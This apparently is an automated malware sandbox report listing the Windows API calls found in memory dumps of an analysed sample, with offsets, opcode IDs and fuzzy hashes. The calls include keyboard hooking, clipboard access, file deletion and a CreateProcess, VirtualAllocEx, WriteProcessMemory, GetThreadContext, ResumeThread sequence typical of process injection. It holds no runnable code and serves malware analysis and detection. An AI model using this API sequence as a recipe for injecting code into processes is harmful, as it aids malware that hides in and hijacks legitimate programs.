                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: Clipboard
                                                          • String ID:
                                                          • API String ID: 220874293-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • MoveFileExW.KERNELBASE(?,00000000,?,?), ref: 0614C038
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: FileMove
                                                          • String ID:
                                                          • API String ID: 3562171763-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: Clipboard
                                                          • String ID:
                                                          • API String ID: 220874293-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • MoveFileExW.KERNELBASE(?,00000000,?,?), ref: 0614C038
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: FileMove
                                                          • String ID:
                                                          • API String ID: 3562171763-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,0614C9CF), ref: 0614CA67
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • DeleteFileW.KERNELBASE(00000000), ref: 0614BA20
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014D6BEF
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 384b5529cd027a6cd9b751e2b1afe6df61ef3caf4f62d91c1d6776ec3eeb6910
                                                          • Instruction ID: 56ddbaa34a0813b55a3a714de50d0519d81572c2b6cdcb703bc7649d6e554ee2
                                                          • Opcode Fuzzy Hash: 384b5529cd027a6cd9b751e2b1afe6df61ef3caf4f62d91c1d6776ec3eeb6910
                                                          • Instruction Fuzzy Hash: A221E3B5900248DFDF10CFA9D584ADEBFF8EB48320F14842AE914A3350D378A954CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014D6BEF
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 64294b0479aeae6fe4874f46acb53900ea4b87a2e32e1de87d15462f3800efc4
                                                          • Instruction ID: 0ce0f14d13a5c516acfdf55a2d31b5ef0711579141a22652ceb2299136acecc4
                                                          • Opcode Fuzzy Hash: 64294b0479aeae6fe4874f46acb53900ea4b87a2e32e1de87d15462f3800efc4
                                                          • Instruction Fuzzy Hash: 8A21C4B5900248DFDF10CFA9D584ADEBBF8EB48324F14842AE914A3310D378A954CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 014D4116
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 6a6d3ec990f182fba6777b274901296562e8f5a1322f378e9874ade006185530
                                                          • Instruction ID: cb808708defb1be2e248855f74dec01f1a71ff60e6c4acfa2deb0959f043594c
                                                          • Opcode Fuzzy Hash: 6a6d3ec990f182fba6777b274901296562e8f5a1322f378e9874ade006185530
                                                          • Instruction Fuzzy Hash: 082115B2D006488FDB14CFAAC44878EFBF4EF88314F28856AD419A7710D375A546CFA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • DeleteFileW.KERNELBASE(00000000), ref: 0614BA20
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          • Opcode ID: 308f00c18aca7c2ce7e9153826a9e2398dfdad5db16eb2285c6b73e3ebe2e4a2
                                                          • Instruction ID: 297ab48f7ccb8106c3bcbeee8f5f2702818cf888879123221bc50738645eebf5
                                                          • Opcode Fuzzy Hash: 308f00c18aca7c2ce7e9153826a9e2398dfdad5db16eb2285c6b73e3ebe2e4a2
                                                          • Instruction Fuzzy Hash: 992133B1D046599BCB14DF9AC5447EEFBF4FF08224F14852AD818B7240D738A954CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 053026F3
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.827215001.0000000005300000.00000040.00000010.sdmp, Offset: 05300000, based on PE: false
                                                          Similarity
                                                          • API ID: HookWindows
                                                          • String ID:
                                                          • API String ID: 2559412058-0
                                                          • Opcode ID: 9fdfbee8c311d9f76f438fea4d9a795a990b4d645593e03532c438c4e7df58c0
                                                          • Instruction ID: 4dedd1f4541627b1a39e467ff4cb83699d99156d6b743e5bda0af61639065359
                                                          • Opcode Fuzzy Hash: 9fdfbee8c311d9f76f438fea4d9a795a990b4d645593e03532c438c4e7df58c0
                                                          • Instruction Fuzzy Hash: AC2129B5900248DFDB14DF99C944BEEFBF5FB88314F14842AE415A7250DBB4A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 053026F3
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.827215001.0000000005300000.00000040.00000010.sdmp, Offset: 05300000, based on PE: false
                                                          Similarity
                                                          • API ID: HookWindows
                                                          • String ID:
                                                          • API String ID: 2559412058-0
                                                          • Opcode ID: fc666fee73e66897ab5b616b19c7fc629dcc784850e228d8792a5343996f7099
                                                          • Instruction ID: ac6c18abe1cdedf6dae1debdff87d354523cf7397a7c5f5f583d7720ff79b74e
                                                          • Opcode Fuzzy Hash: fc666fee73e66897ab5b616b19c7fc629dcc784850e228d8792a5343996f7099
                                                          • Instruction Fuzzy Hash: 092124B5900208CFCB14CF9AC848BEEFBF5FB88314F14842AE419A7250CB74A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0530C0A9,00000800), ref: 0530C13A
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.827215001.0000000005300000.00000040.00000010.sdmp, Offset: 05300000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: eb021cb8235b4ab4ddbb652e10147304dd0a071c5d17291a6fc19f66b760c0ec
                                                          • Instruction ID: 07dd3d1d622c817d4af4f4dc82427a301a1bf6cd0df705555c82f07f84f5114c
                                                          • Opcode Fuzzy Hash: eb021cb8235b4ab4ddbb652e10147304dd0a071c5d17291a6fc19f66b760c0ec
                                                          • Instruction Fuzzy Hash: 9011F4B69002498FDB14CFAAC444BDEFBF4EB59324F14852AD415A7340C379A945CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0530C0A9,00000800), ref: 0530C13A
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.827215001.0000000005300000.00000040.00000010.sdmp, Offset: 05300000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 70cabc04bfbf2256891760d699422b54285888bf8856cbfac60dc2c9376dfc51
                                                          • Instruction ID: 85be9964ce773ac4bc7297efc6f664b1bcbfe1b9c6e9a71e06ca89c86da69abe
                                                          • Opcode Fuzzy Hash: 70cabc04bfbf2256891760d699422b54285888bf8856cbfac60dc2c9376dfc51
                                                          • Instruction Fuzzy Hash: F011F2B69003098BDB14CF9AC844BDEFBF8EB48314F14952AE919A7740C378A945CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlEncodePointer.NTDLL(00000000), ref: 014DC222
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: EncodePointer
                                                          • String ID:
                                                          • API String ID: 2118026453-0
                                                          • Opcode ID: 6a10546e0409292d9af6ed3955cf4db1de4f501e8520803c16a341f615d67bf1
                                                          • Instruction ID: 341061ba85dc22835e2b298614d141e6ea4314a72eba6c3629387fd447e68085
                                                          • Opcode Fuzzy Hash: 6a10546e0409292d9af6ed3955cf4db1de4f501e8520803c16a341f615d67bf1
                                                          • Instruction Fuzzy Hash: D31147B19002458FDF10DFA9D64879EBFF4EB4A314F24842AD809B3641C739A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GlobalMemoryStatusEx.KERNELBASE ref: 053016A7
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.827215001.0000000005300000.00000040.00000010.sdmp, Offset: 05300000, based on PE: false
                                                          Similarity
                                                          • API ID: GlobalMemoryStatus
                                                          • String ID:
                                                          • API String ID: 1890195054-0
                                                          • Opcode ID: 8f33eecda796e08f7799b4e599195d8c5825a657e86800116015c62d2d1ab109
                                                          • Instruction ID: 5f6367d9c6c387a56161304373e674fad8bd7117efc9ef474f747d570d5fbd14
                                                          • Opcode Fuzzy Hash: 8f33eecda796e08f7799b4e599195d8c5825a657e86800116015c62d2d1ab109
                                                          • Instruction Fuzzy Hash: AB11F2B1D006599FCB10CFAAD944BDEFBF4AF48324F18852AD818B7240D378A955CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 014D4116
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: dd27844773a4e00c9b430a9d8983a5843c18aab1b0ca8a568bdb333477c631b3
                                                          • Instruction ID: 0ab598be5bbb17418cfb4d6328d93603ee7349c6658d4e9ed9965760626729f6
                                                          • Opcode Fuzzy Hash: dd27844773a4e00c9b430a9d8983a5843c18aab1b0ca8a568bdb333477c631b3
                                                          • Instruction Fuzzy Hash: 0E11F3B19006498BDB10CF9AC448BDEBBF4EB49214F14842AD919B7610D379A545CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,0614C9CF), ref: 0614CA67
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: fcae9072b95e04eb96c4521bea76cf8ab770038145ea9dff0b1a98523b0a8c0d
                                                          • Instruction ID: 696d81615ee47fe2fe40a0c63688f1220c70099ca636d530adad15e3a488ad3d
                                                          • Opcode Fuzzy Hash: fcae9072b95e04eb96c4521bea76cf8ab770038145ea9dff0b1a98523b0a8c0d
                                                          • Instruction Fuzzy Hash: B41113B1900248CFCB10DFAAC544BDEBBF8EF48224F24882AD519A7310D774A944CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 014D4116
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 08d4dff010d754ecb52c52c2b0f1272518138528691d0ee032c8ce30632ac908
                                                          • Instruction ID: 4a2e262be3168e7eea56c8149589b212f7ad006526945e1fc5822099ee596dfe
                                                          • Opcode Fuzzy Hash: 08d4dff010d754ecb52c52c2b0f1272518138528691d0ee032c8ce30632ac908
                                                          • Instruction Fuzzy Hash: A81102B2D00649CFDB10CFAAD548BDEFBF4EB48224F14842AD559B7610C379A545CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 0614D5E5
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID:
                                                          • API String ID: 2538663250-0
                                                          • Opcode ID: caee24cf59049172614955cde791b326b996498151e42289c863ed10c8edfadc
                                                          • Instruction ID: 87d431a7f14e4beca13d538d21da3e3435f689692ae344c6da61b6bf90f7b707
                                                          • Opcode Fuzzy Hash: caee24cf59049172614955cde791b326b996498151e42289c863ed10c8edfadc
                                                          • Instruction Fuzzy Hash: 8611F2B1D00249CFDB10DF99D548BDEBBF8EB48224F148869D519A7600D778A944CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 0614D5E5
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.828425583.0000000006140000.00000040.00000001.sdmp, Offset: 06140000, based on PE: false
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID:
                                                          • API String ID: 2538663250-0
                                                          • Opcode ID: baffa20efe601eabfa0a7905c7ee5d02d7f2f9037d17f62488a2eb75ae4e3f55
                                                          • Instruction ID: e7add60c3bd930ded5f8a951029b1522383a7479aaac71e396e1a118c64aa8e7
                                                          • Opcode Fuzzy Hash: baffa20efe601eabfa0a7905c7ee5d02d7f2f9037d17f62488a2eb75ae4e3f55
                                                          • Instruction Fuzzy Hash: 041103B1900649CFDB10DF99D544BDEBBF4EB48324F248859D559B7600C738A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.821165543.000000000117D000.00000040.00000001.sdmp, Offset: 0117D000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8886ada1f7485558f0174bd461c0bbbebbda90873b628d110f2076b17f2f433c
                                                          • Instruction ID: 82b394b66d83128e2c550e4849dee5553f93501a0ef5f4436682583943edba85
                                                          • Opcode Fuzzy Hash: 8886ada1f7485558f0174bd461c0bbbebbda90873b628d110f2076b17f2f433c
                                                          • Instruction Fuzzy Hash: 6D212471504208DFDF19DF94E9C4B67BB75FF88324F248569E8060B706C336E446C6A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.821227131.000000000118D000.00000040.00000001.sdmp, Offset: 0118D000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 60162c17b53d32a99aa3f39cebd52c0c8d5530283610505b2a514d5697770f2f
                                                          • Instruction ID: 34e961d7c5a15931f3b26671f3c4610880f49ebeae56523d0ffbc4bc5587b71a
                                                          • Opcode Fuzzy Hash: 60162c17b53d32a99aa3f39cebd52c0c8d5530283610505b2a514d5697770f2f
                                                          • Instruction Fuzzy Hash: 21212571504300DFDF19EF94E9C4B16BBA5FB84354F20CAA9D8094B386C736D847CA62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.821165543.000000000117D000.00000040.00000001.sdmp, Offset: 0117D000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f631457aaa0c6e4f3cb4a4e067b6acc4795b38dac437016503b326b5a78a0402
                                                          • Instruction ID: 9be71c89a850d65b049572e95c81ab0962909ff76e56c81b3067b7cafffde290
                                                          • Opcode Fuzzy Hash: f631457aaa0c6e4f3cb4a4e067b6acc4795b38dac437016503b326b5a78a0402
                                                          • Instruction Fuzzy Hash: 5511AC76504284DFDF16CF54E9C4B16BF71FB84324F2886A9D8050B756C33AD45ACBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.821227131.000000000118D000.00000040.00000001.sdmp, Offset: 0118D000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 32bacf70451705ea961c6d5f0b109703adc9f0fbd3f1c5808569d94555b5c9bf
                                                          • Instruction ID: df33ea9ec99aee54afc307abddf7621291cd3d7b12beb4d434f16a5bdbc3e5fe
                                                          • Opcode Fuzzy Hash: 32bacf70451705ea961c6d5f0b109703adc9f0fbd3f1c5808569d94555b5c9bf
                                                          • Instruction Fuzzy Hash: E411BB75504380CFDB16DF54E5C4B16BBA1FB84324F28C6AAD8494B696C33AD44BCFA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.822654110.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: D0m
                                                          • API String ID: 0-3635740809
                                                          • Opcode ID: 557e1e14e03ff721e7248f84845321b0675aec899d2977da05a401fb9957ee84
                                                          • Instruction ID: c657383dc7dba78c5466f5dd99a55adf47954c07946c7e62903474371c700f67
                                                          • Opcode Fuzzy Hash: 557e1e14e03ff721e7248f84845321b0675aec899d2977da05a401fb9957ee84
                                                          • Instruction Fuzzy Hash: 50818334F101148BCF189BB998646BE7AB7AFC8614F088D2EE517D7389DF349C428B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.827215001.0000000005300000.00000040.00000010.sdmp, Offset: 05300000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d5b48576dc1ec0ad560bac1e3a3fcbc7202ee9122bf0b9f440fd941dd16e915f
                                                          • Instruction ID: 2899511f53865ec88638f6f79fd5eeeeb2b1c5781b73edeb42ab592249f9ced3
                                                          • Opcode Fuzzy Hash: d5b48576dc1ec0ad560bac1e3a3fcbc7202ee9122bf0b9f440fd941dd16e915f
                                                          • Instruction Fuzzy Hash: 09A17E36E0031ACFCF05DFA5D8645EEBBB2FF84301B15856AE805AB261DB71A956CF40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.425199867.0000000006F90000.00000040.00000001.sdmp, Offset: 06F90000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9e97062a6cf24492909d08301d9b14bb4b4077954e92e2e7a0c14bf1a916296a
                                                          • Instruction ID: 089f95dab469843e27653e07e7c33f7913892763d0031963a66b21138d84bea0
                                                          • Opcode Fuzzy Hash: 9e97062a6cf24492909d08301d9b14bb4b4077954e92e2e7a0c14bf1a916296a
                                                          • Instruction Fuzzy Hash: 09314D71D04219CFEF68CF66C845BE9B7B6BB89300F0480EAD51CA7240EB705A84CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F97196
Memory Dump Source
• Source File: 0000000A.00000002.425199867.0000000006F90000.00000040.00000001.sdmp, Offset: 06F90000, based on PE: false
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 4cd2cf17b45dfa958dd908e2f2286edeb6723ac4fdb6c603ebefa9e4d6d17430
• Instruction ID: 13b289f35da7cf0809730a42f3fe2286e8b55901f61b7b9988d3f45b5deca253
• Opcode Fuzzy Hash: 4cd2cf17b45dfa958dd908e2f2286edeb6723ac4fdb6c603ebefa9e4d6d17430
• Instruction Fuzzy Hash: A4914871D10319CFEF64DFA9C8407EEBBB2BB48304F148569E808A7290DB759985CFA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateActCtxA.KERNEL32(?), ref: 011C5431
Memory Dump Source
• Source File: 0000000A.00000002.419225641.00000000011C0000.00000040.00000001.sdmp, Offset: 011C0000, based on PE: false
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 86fb002e5ea1d883286daa25af4abad3d0cf0130843096c27d6d7ff66ed03ed1
• Instruction ID: 714d530157f4480ec1224db98a941db081fc050ec86c2bedd8b1ca1caacccf48
• Opcode Fuzzy Hash: 86fb002e5ea1d883286daa25af4abad3d0cf0130843096c27d6d7ff66ed03ed1
• Instruction Fuzzy Hash: 1D412371D00228CBDB24DFA9C9847CDFBF6BF49708F20806AD408AB211DB75694ACF90
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateActCtxA.KERNEL32(?), ref: 011C5431
Memory Dump Source
• Source File: 0000000A.00000002.419225641.00000000011C0000.00000040.00000001.sdmp, Offset: 011C0000, based on PE: false
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: ee2cd695266e39ae64a7f78c07ae468eb40e590915c098d1fcf7f670bd659ccc
• Instruction ID: 19593709069d76a7ec3836a97cb1d8e70cbe010a73eae0aac741eeb131535d99
• Opcode Fuzzy Hash: ee2cd695266e39ae64a7f78c07ae468eb40e590915c098d1fcf7f670bd659ccc
• Instruction Fuzzy Hash: 27411370D00618CBDB28CFA9C9847CDFBF6BF59708F208469D408AB251D7746946CF90
Uniqueness
• Uniqueness Score: -1.00%

APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F96D68
Memory Dump Source
• Source File: 0000000A.00000002.425199867.0000000006F90000.00000040.00000001.sdmp, Offset: 06F90000, based on PE: false
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: ba52b87cf18453223ede0cdc5178a32d3b35e33e187599f49fb298fbe8431e3a
• Instruction ID: eb4cc8cf3f1a5815c1f53d9985ec5dff33152a350d6367881f58170f776b7ae3
• Opcode Fuzzy Hash: ba52b87cf18453223ede0cdc5178a32d3b35e33e187599f49fb298fbe8431e3a
• Instruction Fuzzy Hash: FC2102B19002599FDF10CFA9C984BDEBBF5FB48214F54882AE918A7240D7789954CBA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F96E48
Memory Dump Source
• Source File: 0000000A.00000002.425199867.0000000006F90000.00000040.00000001.sdmp, Offset: 06F90000, based on PE: false
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: a9001f4d10229ef29242835f66a9464518f264a5d792f6ac046810071b2cdf2c
• Instruction ID: 0c122a8950c5ce93b4a1b7f0922820804dc93fef8a64528a817ba78d39685c34
• Opcode Fuzzy Hash: a9001f4d10229ef29242835f66a9464518f264a5d792f6ac046810071b2cdf2c
• Instruction Fuzzy Hash: CE2119B19003599FDF10DFA9C8847DEBBF5FF48314F548429E518A7240C7359554DBA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetThreadContext.KERNELBASE(?,00000000), ref: 06F96BBE
Memory Dump Source
• Source File: 0000000A.00000002.425199867.0000000006F90000.00000040.00000001.sdmp, Offset: 06F90000, based on PE: false
Similarity
• API ID: ContextThread
• String ID:
• API String ID: 1591575202-0
• Opcode ID: 7d3cb887b4a1c3a909769c99f3d0b04dc2afdb7769e02985a8a877d8497d0ee5
• Instruction ID: f3e415c4150a52591efb9d872442f6e359b0f032c020a580fea391d1418bd55d
• Opcode Fuzzy Hash: 7d3cb887b4a1c3a909769c99f3d0b04dc2afdb7769e02985a8a877d8497d0ee5
• Instruction Fuzzy Hash: 1A211A71D003098FDB50DFAAC4847EEBBF4EF48354F148429D459A7240DB789949CFA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,011CE0E9,00000800,00000000,00000000), ref: 011CE2FA
Memory Dump Source
• Source File: 0000000A.00000002.419225641.00000000011C0000.00000040.00000001.sdmp, Offset: 011C0000, based on PE: false
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 461874d5cf5ffce506843a7b35a95b6aa67d0a7ac25918d9f3be2679cad58adb
• Instruction ID: ce436485a0a65d93322ea34d146d409c0902bd671a0f56b5786218b8dc586def
• Opcode Fuzzy Hash: 461874d5cf5ffce506843a7b35a95b6aa67d0a7ac25918d9f3be2679cad58adb
• Instruction Fuzzy Hash: 351103B29002488FDB14CF9AC444BDEFBF9EB58714F14842ED915A7200C379A545CFA5
Uniqueness
• Uniqueness Score: -1.00%

APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F96C86
Memory Dump Source
• Source File: 0000000A.00000002.425199867.0000000006F90000.00000040.00000001.sdmp, Offset: 06F90000, based on PE: false
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: fca0940da39121a73ad066907b2385b9e6d420f78fd889d18b01fcad01cd184a
• Instruction ID: 60291bd47000278ba4ffbb74ff842badd02a46297b650f8b5e330f780f1ccd9c
• Opcode Fuzzy Hash: fca0940da39121a73ad066907b2385b9e6d420f78fd889d18b01fcad01cd184a
• Instruction Fuzzy Hash: C21134729002489FDF10DFAAC844BDFBBF9EF48324F148829E919A7250C775A954CFA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.425199867.0000000006F90000.00000040.00000001.sdmp, Offset: 06F90000, based on PE: false
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: cc703096ef4ea25cb2f64435fed119be32b0a1b7fcbf622afc92e9527a823c55
• Instruction ID: d3ed3da860dbac18169589c56e3cf3f84f1ede657bac531c6db5fe616408822e
• Opcode Fuzzy Hash: cc703096ef4ea25cb2f64435fed119be32b0a1b7fcbf622afc92e9527a823c55
• Instruction Fuzzy Hash: 0E1106B1D003588BDF10DFAAC4447DEFBF9EB88228F148829D419A7340DB79A944CFA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 011CE06E
Memory Dump Source
• Source File: 0000000A.00000002.419225641.00000000011C0000.00000040.00000001.sdmp, Offset: 011C0000, based on PE: false
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: dfb87d641e2ad28f09731804a6951765efa0598e260ef1ea7380f622ef4f0e5e
• Instruction ID: f48ead6f128de5982fcde54b48cb9d62192ddf4b2a85b8647249734d988eec72
• Opcode Fuzzy Hash: dfb87d641e2ad28f09731804a6951765efa0598e260ef1ea7380f622ef4f0e5e
• Instruction Fuzzy Hash: F11110B1D002498FDB24CF9AC444BDEFBF8AB88724F14852AD829A7200C379A545CFA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• PostMessageW.USER32(?,?,?,?), ref: 06F99825
Memory Dump Source
• Source File: 0000000A.00000002.425199867.0000000006F90000.00000040.00000001.sdmp, Offset: 06F90000, based on PE: false
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: 2a603083a9cdb18c2ed32f4613aa3c769394bf608f551152e3bdbb679f28bc47
• Instruction ID: 02412cd2e5584ad5ee983519db2bdf26d21d4b6e874b721844f76318e2c50eb8
• Opcode Fuzzy Hash: 2a603083a9cdb18c2ed32f4613aa3c769394bf608f551152e3bdbb679f28bc47
• Instruction Fuzzy Hash: BE11E2B5900349DFDB10CF9AD889BDEBBF8FB58324F14841AE954A7600C374A944CFA1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.419024861.000000000111D000.00000040.00000001.sdmp, Offset: 0111D000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 25884720a3fcd75db14e739bab13fa78f69b1f2f8e675c3a0ecb346e4c38ebbb
• Instruction ID: 37c8b5a518c549f9460e8b6be5582d93169e6e1c375db1d8113a7b04ac372db4
